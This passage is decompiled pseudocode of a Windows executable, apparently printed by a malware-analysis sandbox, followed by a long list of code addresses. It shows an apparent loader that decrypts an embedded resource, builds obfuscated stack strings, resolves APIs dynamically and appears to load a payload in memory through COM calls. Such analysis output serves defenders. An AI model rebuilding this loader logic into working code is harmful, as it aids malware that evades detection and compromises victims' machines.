						 *((char*)(_t557 + 0x3b)) = 0xb4;
						 *((char*)(_t557 + 0x3c)) = 0;
						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
						_t558 = _t557 + 8;
						_t536 = FindResourceA(_t526, _t344, 0xa);
						 *(_t558 + 0x50) = _t536;
						_t551 = LoadResource(_t526, _t536);
						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
						_push(0x40022);
						_t537 = _t349; // executed
						_t350 = E0040AF66(0, _t526, __eflags); // executed
						_t559 = _t558 + 8;
						 *(_t559 + 0x34) = _t350;
						__eflags = _t350;
						if(_t350 == 0) {
							 *(_t559 + 0x50) = 0;
						} else {
							E0040BA30(_t526, _t350, 0, 0x40022);
							_t486 =  *(_t559 + 0x40);
							_t559 = _t559 + 0xc;
							 *(_t559 + 0x50) = _t486;
						}
						E00401300( *(_t559 + 0x50));
						_t497 =  *(_t559 + 0x48);
						_t352 = SizeofResource(_t526, _t497);
						 *(_t559 + 0x40) = _t352;
						asm("cdq");
						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
						__eflags = _t354;
						if(_t354 > 0) {
							_t519 =  *(_t559 + 0x3c);
							_t482 = _t537 - _t519;
							__eflags = _t482;
							 *(_t559 + 0x34) = _t519;
							 *(_t559 + 0x88) = _t482;
							 *(_t559 + 0x38) = _t354;
							do {
								_t424 =  *(_t559 + 0x34);
								_push( *(_t559 + 0x88) + _t424);
								_push(0x400);
								_push(_t424);
								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
								_t179 = _t559 + 0x38;
								 *_t179 =  *(_t559 + 0x38) - 1;
								__eflags =  *_t179;
							} while ( *_t179 != 0);
						}
						_t448 =  *(_t559 + 0x40) & 0x800003ff;
						__eflags = _t448;
						if(_t448 < 0) {
							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
							__eflags = _t448;
						}
						__eflags = _t448;
						if(_t448 > 0) {
							_t421 =  *(_t559 + 0x40) - _t448;
							_push(_t421 + _t537);
							_push(_t448);
							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
							__eflags = _t422;
							_push(_t422);
							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
						}
						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
						_t560 = _t559 + 0xc;
						FreeResource(_t551);
						_t552 =  *_t537;
						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
						_t561 = _t560 + 4;
						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
						_t527 =  *((intOrPtr*)(_t561 + 0x38));
						_t192 = _t537 + 4; // 0x4
						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
						_t528 = _t527 + 0xe;
						 *((char*)(_t561 + 0x34)) = 0xce;
						 *((char*)(_t561 + 0x35)) = 0x27;
						 *((char*)(_t561 + 0x36)) = 0x9c;
						 *((char*)(_t561 + 0x37)) = 0x1a;
						 *((char*)(_t561 + 0x38)) = 0x95;
						 *((char*)(_t561 + 0x39)) = 0x21;
						 *((char*)(_t561 + 0x3a)) = 0x2e;
						 *((char*)(_t561 + 0x3b)) = 0xd;
						 *((char*)(_t561 + 0x3c)) = 0xdb;
						 *((char*)(_t561 + 0x3d)) = 0x29;
						 *((char*)(_t561 + 0x3e)) = 0x57;
						 *((char*)(_t561 + 0x3f)) = 0x56;
						 *((char*)(_t561 + 0x40)) = 0xf8;
						 *((char*)(_t561 + 0x41)) = 0x98;
						 *((char*)(_t561 + 0x42)) = 0x5b;
						 *((char*)(_t561 + 0x43)) = 0xf4;
						 *((char*)(_t561 + 0x44)) = 0xb5;
						 *((char*)(_t561 + 0x45)) = 0x87;
						 *((char*)(_t561 + 0x46)) = 0x7b;
						 *((char*)(_t561 + 0x47)) = 0xf;
						 *((char*)(_t561 + 0x48)) = 0xf4;
						 *((char*)(_t561 + 0x49)) = 0x76;
						 *((char*)(_t561 + 0x4a)) = 0xb9;
						 *((char*)(_t561 + 0x4b)) = 0x34;
						 *((char*)(_t561 + 0x4c)) = 0xbf;
						 *((char*)(_t561 + 0x4d)) = 0x1e;
						 *((char*)(_t561 + 0x4e)) = 0xe7;
						 *((char*)(_t561 + 0x4f)) = 0x78;
						 *((char*)(_t561 + 0x50)) = 0x98;
						 *((char*)(_t561 + 0x51)) = 0xe9;
						 *((char*)(_t561 + 0x52)) = 0x6f;
						 *((char*)(_t561 + 0x53)) = 0xb4;
						 *((char*)(_t561 + 0x54)) = 0;
						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
						_t562 = _t561 + 0x24;
						_t365 = LoadLibraryA(_t364); // executed
						_t538 = _t365;
						 *((char*)(_t562 + 0x10)) = 0xe0;
						 *((char*)(_t562 + 0x11)) = 0x18;
						 *((char*)(_t562 + 0x12)) = 0xad;
						 *((char*)(_t562 + 0x13)) = 0x36;
						 *((char*)(_t562 + 0x14)) = 0x95;
						 *((char*)(_t562 + 0x15)) = 0x21;
						_t451 = _t562 + 0x134;
						 *((char*)(_t562 + 0x1e)) = 0x2a;
						 *((char*)(_t562 + 0x1f)) = 0x57;
						 *((char*)(_t562 + 0x20)) = 0xda;
						 *((char*)(_t562 + 0x21)) = 0xc;
						 *((char*)(_t562 + 0x22)) = 0x55;
						 *((char*)(_t562 + 0x23)) = 0x25;
						 *((char*)(_t562 + 0x24)) = 0x8c;
						 *((char*)(_t562 + 0x25)) = 0xf9;
						 *((char*)(_t562 + 0x26)) = 0x35;
						 *((char*)(_t562 + 0x27)) = 0x97;
						 *((char*)(_t562 + 0x28)) = 0xd0;
						 *((char*)(_t562 + 0x29)) = 0x87;
						 *((char*)(_t562 + 0x2a)) = 0x7b;
						 *((char*)(_t562 + 0x2b)) = 0xf;
						 *((char*)(_t562 + 0x2c)) = 0xf4;
						 *((char*)(_t562 + 0x2d)) = 0x76;
						 *((char*)(_t562 + 0x2e)) = 0xb9;
						 *((char*)(_t562 + 0x2f)) = 0x34;
						 *((char*)(_t562 + 0x30)) = 0xbf;
						 *((char*)(_t562 + 0x31)) = 0x1e;
						 *((char*)(_t562 + 0x32)) = 0xe7;
						 *((char*)(_t562 + 0x33)) = 0x78;
						 *((char*)(_t562 + 0x34)) = 0x98;
						 *((char*)(_t562 + 0x35)) = 0xe9;
						 *((char*)(_t562 + 0x36)) = 0x6f;
						 *((char*)(_t562 + 0x37)) = 0xb4;
						 *((char*)(_t562 + 0x38)) = 0;
						_t366 = E00401650(_t562 + 0x14, _t451);
						_t563 = _t562 + 8;
						_t367 = GetProcAddress(_t365, _t366);
						__eflags = _t367;
						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
						__eflags = _t452;
						 *(_t563 + 0x47) = _t452 == 0;
						 *0x423480 = _t367;
						 *((intOrPtr*)(_t563 + 0x80)) = 0;
						 *((intOrPtr*)(_t563 + 0x84)) = 0;
						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
						 *(_t563 + 0x58) = 0;
						 *(_t563 + 0x54) = 0;
						__eflags = _t452;
						if(_t452 != 0) {
							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
							__eflags = _t368;
							if(_t368 >= 0) {
								__eflags =  *(_t563 + 0x47);
								if( *(_t563 + 0x47) == 0) {
									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
									_t376 =  *((intOrPtr*)(_t563 + 0x80));
									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
									__eflags = _t378;
									if(_t378 >= 0) {
										_t381 =  *((intOrPtr*)(_t563 + 0x84));
										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
										__eflags = _t383;
										if(_t383 >= 0) {
											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
											__eflags = _t385;
											if(_t385 >= 0) {
												 *((intOrPtr*)(_t563 + 0x38)) = 0;
												E00401870(_t563 + 0x44, _t552, "_._");
												_t539 = __imp__#8;
												 *((intOrPtr*)(_t563 + 0x40)) = 0;
												 *_t539(_t563 + 0x94);
												E00401870(_t563 + 0x3c, _t552, "___");
												 *_t539(_t563 + 0xa4);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
												_t542 =  *(_t563 + 0x58);
												__eflags = _t542;
												if(_t542 == 0) {
													E0040AD90(0x80004003);
												}
												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
												 *((intOrPtr*)(_t563 + 0x98)) = 0;
												__imp__#15(0x11, 1, _t563 + 0x88); // executed
												_t543 = _t396;
												 *((intOrPtr*)(_t563 + 0x50)) = 0;
												__imp__#23(_t543, _t563 + 0x48);
												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
												_t564 = _t563 + 0xc;
												__imp__#24(_t543);
												_t399 =  *(_t564 + 0x54);
												__eflags = _t399;
												if(_t399 == 0) {
													_t399 = E0040AD90(0x80004003);
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
												__eflags = _t543;
												if(_t543 != 0) {
													__imp__#16(_t543);
												}
												_t402 =  *(_t564 + 0x34);
												__eflags = _t402;
												if(_t402 == 0) {
													_t402 = E0040AD90(0x80004003);
												}
												_t469 =  *(_t564 + 0x40);
												_t555 = _t402;
												__eflags = _t469;
												if(_t469 == 0) {
													_t531 = 0;
													__eflags = 0;
												} else {
													_t531 =  *_t469;
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
												__imp__#411(0xc, 0, 0);
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
												_t538 = __imp__#9; // 0x76e3cf00
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
												if(_t415 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
												}
											}
										}
									}
									_t379 =  *((intOrPtr*)(_t563 + 0x174));
									__eflags = _t379 - _t563 + 0x178;
									if(__eflags != 0) {
										_push(_t379);
										E0040B6B5(0, _t528, _t538, __eflags);
										_t563 = _t563 + 4;
									}
								}
							}
							_t369 =  *(_t563 + 0x54);
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
							}
							_t370 =  *(_t563 + 0x58);
							__eflags = _t370;
							if(_t370 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
							}
						}
						goto L80;
					} else {
						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
						_t565 = _t557 + 8;
						_t547 = _t428;
						_t520 = _t565 + 0x298;
						while(1) {
							_t429 =  *_t520;
							if(_t429 !=  *_t547) {
								break;
							}
							if(_t429 == 0) {
								L7:
								_t429 = 0;
							} else {
								_t493 =  *((intOrPtr*)(_t520 + 1));
								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
									break;
								} else {
									_t520 = _t520 + 2;
									_t547 = _t547 + 2;
									if(_t493 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t429 != 0) {
								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
								_t557 = _t565 + 8;
								_t548 = _t431;
								_t488 = _t557 + 0x298;
								while(1) {
									_t432 =  *_t488;
									__eflags = _t432 -  *_t548;
									if(_t432 !=  *_t548) {
										break;
									}
									__eflags = _t432;
									if(_t432 == 0) {
										L16:
										_t432 = 0;
									} else {
										_t432 =  *((intOrPtr*)(_t488 + 1));
										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
											break;
										} else {
											_t488 = _t488 + 2;
											_t548 = _t548 + 2;
											__eflags = _t432;
											if(_t432 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t432;
									if(_t432 == 0) {
										goto L10;
									} else {
										_t435 = Module32Next(_t525, _t557 + 0x278);
										__eflags = _t435;
										if(_t435 != 0) {
											do {
												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
												_t566 = _t557 + 8;
												_t549 = _t437;
												_t490 = _t566 + 0x298;
												while(1) {
													_t438 =  *_t490;
													__eflags = _t438 -  *_t549;
													if(_t438 !=  *_t549) {
														break;
													}
													__eflags = _t438;
													if(_t438 == 0) {
														L26:
														_t438 = 0;
													} else {
														_t438 =  *((intOrPtr*)(_t490 + 1));
														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
															break;
														} else {
															_t490 = _t490 + 2;
															_t549 = _t549 + 2;
															__eflags = _t438;
															if(_t438 != 0) {
																continue;
															} else {
																goto L26;
															}
														}
													}
													L28:
													__eflags = _t438;
													if(_t438 == 0) {
														goto L10;
													} else {
														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
														_t557 = _t566 + 8;
														_t550 = _t439;
														_t492 = _t557 + 0x298;
														while(1) {
															_t440 =  *_t492;
															__eflags = _t440 -  *_t550;
															if(_t440 !=  *_t550) {
																break;
															}
															__eflags = _t440;
															if(_t440 == 0) {
																L34:
																_t440 = 0;
															} else {
																_t440 =  *((intOrPtr*)(_t492 + 1));
																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
																	break;
																} else {
																	_t492 = _t492 + 2;
																	_t550 = _t550 + 2;
																	__eflags = _t440;
																	if(_t440 != 0) {
																		continue;
																	} else {
																		goto L34;
																	}
																}
															}
															L36:
															__eflags = _t440;
															if(_t440 == 0) {
																goto L10;
															} else {
																goto L37;
															}
															goto L81;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L81;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t442 = Module32Next(_t525, _t557 + 0x278);
												__eflags = _t442;
											} while (_t442 != 0);
										}
										goto L38;
									}
									goto L81;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t525);
								return 0;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L81:
			}

































































































                                                                                                                                                  0x004019f0
                                                                                                                                                  0x004019f0
                                                                                                                                                  0x004019fd
                                                                                                                                                  0x00401a10
                                                                                                                                                  0x00401a15
                                                                                                                                                  0x00401a1a
                                                                                                                                                  0x00401a1f
                                                                                                                                                  0x00401a24
                                                                                                                                                  0x00401a29
                                                                                                                                                  0x00401a2e
                                                                                                                                                  0x00401a33
                                                                                                                                                  0x00401a38
                                                                                                                                                  0x00401a3d
                                                                                                                                                  0x00401a42
                                                                                                                                                  0x00401a47
                                                                                                                                                  0x00401a4c
                                                                                                                                                  0x00401a51
                                                                                                                                                  0x00401a56
                                                                                                                                                  0x00401a5b
                                                                                                                                                  0x00401a60
                                                                                                                                                  0x00401a65
                                                                                                                                                  0x00401a6a
                                                                                                                                                  0x00401a6f
                                                                                                                                                  0x00401a74
                                                                                                                                                  0x00401a79
                                                                                                                                                  0x00401a7e
                                                                                                                                                  0x00401a83
                                                                                                                                                  0x00401a88
                                                                                                                                                  0x00401a8d
                                                                                                                                                  0x00401a92
                                                                                                                                                  0x00401a97
                                                                                                                                                  0x00401a9c
                                                                                                                                                  0x00401aa1
                                                                                                                                                  0x00401aa6
                                                                                                                                                  0x00401aab
                                                                                                                                                  0x00401ab0
                                                                                                                                                  0x00401ab9
                                                                                                                                                  0x00401aba
                                                                                                                                                  0x00401abf
                                                                                                                                                  0x00401ac7
                                                                                                                                                  0x0040248d
                                                                                                                                                  0x0040248d
                                                                                                                                                  0x00402496
                                                                                                                                                  0x00401acd
                                                                                                                                                  0x00401ad6
                                                                                                                                                  0x00401ae2
                                                                                                                                                  0x00401ae6
                                                                                                                                                  0x00401af1
                                                                                                                                                  0x00401af6
                                                                                                                                                  0x00401afb
                                                                                                                                                  0x00401b00
                                                                                                                                                  0x00401b05
                                                                                                                                                  0x00401b0a
                                                                                                                                                  0x00401b0f
                                                                                                                                                  0x00401b14
                                                                                                                                                  0x00401b19
                                                                                                                                                  0x00401b1e
                                                                                                                                                  0x00401b23
                                                                                                                                                  0x00401b28
                                                                                                                                                  0x00401b2d
                                                                                                                                                  0x00401b32
                                                                                                                                                  0x00401b37
                                                                                                                                                  0x00401b3c
                                                                                                                                                  0x00401b41
                                                                                                                                                  0x00401b46
                                                                                                                                                  0x00401b4b
                                                                                                                                                  0x00401b50
                                                                                                                                                  0x00401b55
                                                                                                                                                  0x00401b5a
                                                                                                                                                  0x00401b5f
                                                                                                                                                  0x00401b64
                                                                                                                                                  0x00401b69
                                                                                                                                                  0x00401b6e
                                                                                                                                                  0x00401b73
                                                                                                                                                  0x00401b78
                                                                                                                                                  0x00401b7d
                                                                                                                                                  0x00401b85
                                                                                                                                                  0x00401b8d
                                                                                                                                                  0x00401b95
                                                                                                                                                  0x00401b9d
                                                                                                                                                  0x00401ba4
                                                                                                                                                  0x00401ba9
                                                                                                                                                  0x00401bae
                                                                                                                                                  0x00401bb3
                                                                                                                                                  0x00401bb8
                                                                                                                                                  0x00401bbd
                                                                                                                                                  0x00401bc2
                                                                                                                                                  0x00401bc7
                                                                                                                                                  0x00401bcc
                                                                                                                                                  0x00401bd1
                                                                                                                                                  0x00401bd6
                                                                                                                                                  0x00401bdb
                                                                                                                                                  0x00401be0
                                                                                                                                                  0x00401be5
                                                                                                                                                  0x00401bea
                                                                                                                                                  0x00401bef
                                                                                                                                                  0x00401bf4
                                                                                                                                                  0x00401bf9
                                                                                                                                                  0x00401bfe
                                                                                                                                                  0x00401c03
                                                                                                                                                  0x00401c08
                                                                                                                                                  0x00401c0d
                                                                                                                                                  0x00401c12
                                                                                                                                                  0x00401c17
                                                                                                                                                  0x00401c1c
                                                                                                                                                  0x00401c21
                                                                                                                                                  0x00401c26
                                                                                                                                                  0x00401c2b
                                                                                                                                                  0x00401c30
                                                                                                                                                  0x00401c35
                                                                                                                                                  0x00401c3a
                                                                                                                                                  0x00401c3f
                                                                                                                                                  0x00401c44
                                                                                                                                                  0x00401c48
                                                                                                                                                  0x00401c4f
                                                                                                                                                  0x00401dc3
                                                                                                                                                  0x00401dc4
                                                                                                                                                  0x00401de0
                                                                                                                                                  0x00401de2
                                                                                                                                                  0x00401de7
                                                                                                                                                  0x00401dec
                                                                                                                                                  0x00401df1
                                                                                                                                                  0x00401df6
                                                                                                                                                  0x00401dfb
                                                                                                                                                  0x00401e00
                                                                                                                                                  0x00401e05
                                                                                                                                                  0x00401e0a
                                                                                                                                                  0x00401e0f
                                                                                                                                                  0x00401e14
                                                                                                                                                  0x00401e19
                                                                                                                                                  0x00401e1e
                                                                                                                                                  0x00401e23
                                                                                                                                                  0x00401e28
                                                                                                                                                  0x00401e2d
                                                                                                                                                  0x00401e32
                                                                                                                                                  0x00401e37
                                                                                                                                                  0x00401e3c
                                                                                                                                                  0x00401e41
                                                                                                                                                  0x00401e46
                                                                                                                                                  0x00401e4b
                                                                                                                                                  0x00401e50
                                                                                                                                                  0x00401e55
                                                                                                                                                  0x00401e5a
                                                                                                                                                  0x00401e5f
                                                                                                                                                  0x00401e64
                                                                                                                                                  0x00401e69
                                                                                                                                                  0x00401e6e
                                                                                                                                                  0x00401e73
                                                                                                                                                  0x00401e78
                                                                                                                                                  0x00401e7d
                                                                                                                                                  0x00401e82
                                                                                                                                                  0x00401e86
                                                                                                                                                  0x00401e8b
                                                                                                                                                  0x00401e96
                                                                                                                                                  0x00401e9a
                                                                                                                                                  0x00401ea4
                                                                                                                                                  0x00401eaf
                                                                                                                                                  0x00401eba
                                                                                                                                                  0x00401ebf
                                                                                                                                                  0x00401ec4
                                                                                                                                                  0x00401ec6
                                                                                                                                                  0x00401ecb
                                                                                                                                                  0x00401ece
                                                                                                                                                  0x00401ed2
                                                                                                                                                  0x00401ed4
                                                                                                                                                  0x00401eef
                                                                                                                                                  0x00401ed6
                                                                                                                                                  0x00401edd
                                                                                                                                                  0x00401ee2
                                                                                                                                                  0x00401ee6
                                                                                                                                                  0x00401ee9
                                                                                                                                                  0x00401ee9
                                                                                                                                                  0x00401ef7
                                                                                                                                                  0x00401efc
                                                                                                                                                  0x00401f02
                                                                                                                                                  0x00401f08
                                                                                                                                                  0x00401f0c
                                                                                                                                                  0x00401f15
                                                                                                                                                  0x00401f18
                                                                                                                                                  0x00401f1a
                                                                                                                                                  0x00401f1c
                                                                                                                                                  0x00401f22
                                                                                                                                                  0x00401f22
                                                                                                                                                  0x00401f24
                                                                                                                                                  0x00401f28
                                                                                                                                                  0x00401f2f
                                                                                                                                                  0x00401f33
                                                                                                                                                  0x00401f33
                                                                                                                                                  0x00401f40
                                                                                                                                                  0x00401f45
                                                                                                                                                  0x00401f4a
                                                                                                                                                  0x00401f4b
                                                                                                                                                  0x00401f50
                                                                                                                                                  0x00401f58
                                                                                                                                                  0x00401f58
                                                                                                                                                  0x00401f58
                                                                                                                                                  0x00401f58
                                                                                                                                                  0x00401f33
                                                                                                                                                  0x00401f63
                                                                                                                                                  0x00401f63
                                                                                                                                                  0x00401f69
                                                                                                                                                  0x00401f72
                                                                                                                                                  0x00401f72
                                                                                                                                                  0x00401f72
                                                                                                                                                  0x00401f73
                                                                                                                                                  0x00401f75
                                                                                                                                                  0x00401f7b
                                                                                                                                                  0x00401f80
                                                                                                                                                  0x00401f81
                                                                                                                                                  0x00401f86
                                                                                                                                                  0x00401f86
                                                                                                                                                  0x00401f8c
                                                                                                                                                  0x00401f8d
                                                                                                                                                  0x00401f8d
                                                                                                                                                  0x00401f9d
                                                                                                                                                  0x00401fa2
                                                                                                                                                  0x00401fa6
                                                                                                                                                  0x00401fac
                                                                                                                                                  0x00401faf
                                                                                                                                                  0x00401fb6
                                                                                                                                                  0x00401fbf
                                                                                                                                                  0x00401fc4
                                                                                                                                                  0x00401fc8
                                                                                                                                                  0x00401fce
                                                                                                                                                  0x00401fd3
                                                                                                                                                  0x00401fe0
                                                                                                                                                  0x00401fec
                                                                                                                                                  0x00401ffe
                                                                                                                                                  0x00402001
                                                                                                                                                  0x00402006
                                                                                                                                                  0x0040200b
                                                                                                                                                  0x00402010
                                                                                                                                                  0x00402015
                                                                                                                                                  0x0040201a
                                                                                                                                                  0x0040201f
                                                                                                                                                  0x00402024
                                                                                                                                                  0x00402029
                                                                                                                                                  0x0040202e
                                                                                                                                                  0x00402033
                                                                                                                                                  0x00402038
                                                                                                                                                  0x0040203d
                                                                                                                                                  0x00402042
                                                                                                                                                  0x00402047
                                                                                                                                                  0x0040204c
                                                                                                                                                  0x00402051
                                                                                                                                                  0x00402056
                                                                                                                                                  0x0040205b
                                                                                                                                                  0x00402060
                                                                                                                                                  0x00402065
                                                                                                                                                  0x0040206a
                                                                                                                                                  0x0040206f
                                                                                                                                                  0x00402074
                                                                                                                                                  0x00402079
                                                                                                                                                  0x0040207e
                                                                                                                                                  0x00402083
                                                                                                                                                  0x00402088
                                                                                                                                                  0x0040208d
                                                                                                                                                  0x00402092
                                                                                                                                                  0x00402097
                                                                                                                                                  0x0040209c
                                                                                                                                                  0x004020a1
                                                                                                                                                  0x004020a5
                                                                                                                                                  0x004020aa
                                                                                                                                                  0x004020ae
                                                                                                                                                  0x004020b4
                                                                                                                                                  0x004020b6
                                                                                                                                                  0x004020bb
                                                                                                                                                  0x004020c0
                                                                                                                                                  0x004020c5
                                                                                                                                                  0x004020ca
                                                                                                                                                  0x004020cf
                                                                                                                                                  0x004020d4
                                                                                                                                                  0x004020e1
                                                                                                                                                  0x004020e6
                                                                                                                                                  0x004020eb
                                                                                                                                                  0x004020f0
                                                                                                                                                  0x004020f5
                                                                                                                                                  0x004020fa
                                                                                                                                                  0x004020ff
                                                                                                                                                  0x00402104
                                                                                                                                                  0x00402109
                                                                                                                                                  0x0040210e
                                                                                                                                                  0x00402113
                                                                                                                                                  0x00402118
                                                                                                                                                  0x0040211d
                                                                                                                                                  0x00402122
                                                                                                                                                  0x00402127
                                                                                                                                                  0x0040212c
                                                                                                                                                  0x00402131
                                                                                                                                                  0x00402136
                                                                                                                                                  0x0040213b
                                                                                                                                                  0x00402140
                                                                                                                                                  0x00402145
                                                                                                                                                  0x0040214a
                                                                                                                                                  0x0040214f
                                                                                                                                                  0x00402154
                                                                                                                                                  0x00402159
                                                                                                                                                  0x0040215e
                                                                                                                                                  0x00402163
                                                                                                                                                  0x00402167
                                                                                                                                                  0x0040216c
                                                                                                                                                  0x00402171
                                                                                                                                                  0x00402177
                                                                                                                                                  0x00402179
                                                                                                                                                  0x0040217c
                                                                                                                                                  0x0040217e
                                                                                                                                                  0x00402183
                                                                                                                                                  0x00402188
                                                                                                                                                  0x0040218f
                                                                                                                                                  0x00402196
                                                                                                                                                  0x0040219a
                                                                                                                                                  0x0040219e
                                                                                                                                                  0x004021a2
                                                                                                                                                  0x004021a4
                                                                                                                                                  0x004021bc
                                                                                                                                                  0x004021be
                                                                                                                                                  0x004021c0
                                                                                                                                                  0x004021c6
                                                                                                                                                  0x004021ca
                                                                                                                                                  0x004021e5
                                                                                                                                                  0x004021ec
                                                                                                                                                  0x004021f1
                                                                                                                                                  0x00402213
                                                                                                                                                  0x00402215
                                                                                                                                                  0x00402217
                                                                                                                                                  0x0040221d
                                                                                                                                                  0x00402239
                                                                                                                                                  0x0040223b
                                                                                                                                                  0x0040223d
                                                                                                                                                  0x00402243
                                                                                                                                                  0x0040224d
                                                                                                                                                  0x0040224f
                                                                                                                                                  0x00402251
                                                                                                                                                  0x00402260
                                                                                                                                                  0x00402264
                                                                                                                                                  0x00402269
                                                                                                                                                  0x00402277
                                                                                                                                                  0x0040227b
                                                                                                                                                  0x00402286
                                                                                                                                                  0x00402293
                                                                                                                                                  0x004022af
                                                                                                                                                  0x004022b1
                                                                                                                                                  0x004022b5
                                                                                                                                                  0x004022b7
                                                                                                                                                  0x004022be
                                                                                                                                                  0x004022be
                                                                                                                                                  0x004022d7
                                                                                                                                                  0x004022e8
                                                                                                                                                  0x004022ef
                                                                                                                                                  0x004022f6
                                                                                                                                                  0x00402300
                                                                                                                                                  0x00402304
                                                                                                                                                  0x00402308
                                                                                                                                                  0x00402315
                                                                                                                                                  0x0040231a
                                                                                                                                                  0x0040231e
                                                                                                                                                  0x00402324
                                                                                                                                                  0x00402328
                                                                                                                                                  0x0040232a
                                                                                                                                                  0x00402331
                                                                                                                                                  0x00402331
                                                                                                                                                  0x0040234e
                                                                                                                                                  0x00402350
                                                                                                                                                  0x00402352
                                                                                                                                                  0x00402355
                                                                                                                                                  0x00402355
                                                                                                                                                  0x0040235b
                                                                                                                                                  0x0040235f
                                                                                                                                                  0x00402361
                                                                                                                                                  0x00402368
                                                                                                                                                  0x00402368
                                                                                                                                                  0x0040236d
                                                                                                                                                  0x00402371
                                                                                                                                                  0x00402373
                                                                                                                                                  0x00402375
                                                                                                                                                  0x0040237b
                                                                                                                                                  0x0040237b
                                                                                                                                                  0x00402377
                                                                                                                                                  0x00402377
                                                                                                                                                  0x00402377
                                                                                                                                                  0x00402390
                                                                                                                                                  0x00402396
                                                                                                                                                  0x0040239c
                                                                                                                                                  0x004023a0
                                                                                                                                                  0x004023a2
                                                                                                                                                  0x004023a9
                                                                                                                                                  0x004023a9
                                                                                                                                                  0x004023ae
                                                                                                                                                  0x004023b2
